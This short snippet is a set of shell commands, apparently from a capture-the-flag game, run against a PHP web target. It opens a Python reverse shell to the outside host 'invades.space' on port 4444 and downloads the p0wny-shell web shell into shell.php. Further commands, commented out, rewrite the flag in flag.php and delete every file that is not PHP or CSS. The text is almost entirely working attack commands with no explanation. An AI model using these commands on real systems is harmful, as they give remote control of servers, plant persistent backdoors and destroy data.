#export RHOST="invades.space";export RPORT=4444;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")' echo 'pwned' curl https://raw.githubusercontent.com/flozz/p0wny-shell/master/shell.php > shell.php #cp flag.php flag.php2 #mv flag.php2 flag.php #sed -i 's/flag{pHp_is_A_gREaT_LanguAGe}/flag{b01lers_w4z_h3r3}/g' flag.php #find . -not -name '*.php' -not -name '*.css' -type f -exec rm -f {} +